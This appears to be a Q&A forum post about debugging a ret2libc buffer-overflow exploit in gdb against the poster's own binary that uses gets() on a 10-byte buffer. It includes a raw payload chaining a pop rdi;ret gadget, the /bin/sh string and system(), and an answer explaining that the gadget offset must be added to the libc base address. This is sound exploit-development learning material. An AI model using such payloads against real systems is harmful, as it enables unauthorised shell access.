I input the following in gdb for ret2libc.
(gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/kali/Desktop/c_system/a < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")')
While i checked the memory it displayed wrong values after 0x267de
(gdb) x/4g $rbp
0x7fffffffe190: 0x4242424242424242 0x00000000000267de
0x7fffffffe1a0: 0x007fff370cf7b1ac 0x007ffff7e408a000
All the addresses are correct and finally the program ended in segmentation fault.
AAAAAAAAAABBBBBBBB�g
Program received signal SIGSEGV, Segmentation fault.
0x00000000000267de in ?? ()
The gadget chosen was pop rdi;ret which is at 0x267de ,/bin/sh is at 0x7ffff7f7b1ac and system() is at 0x7ffff7e408a0 gets() was used to input the buffer which is 10 bytes long and no other variables are present in the source code.
Why wrong values are displayed?
As @Mark Plotnick said 0x267de was the offset of the gadget pop rdi; ret. So in order to find the correct address of the gadget, the offset must be added with the base address. I used radare2 to find the gadget loading the path of libc as binary path. This implies that base address of libc is the base address of the gadget. To find the base address of libc I used info proc map in gdb. Also there are other ways to find the base address of libc. And when this address was used the address display issue was resolved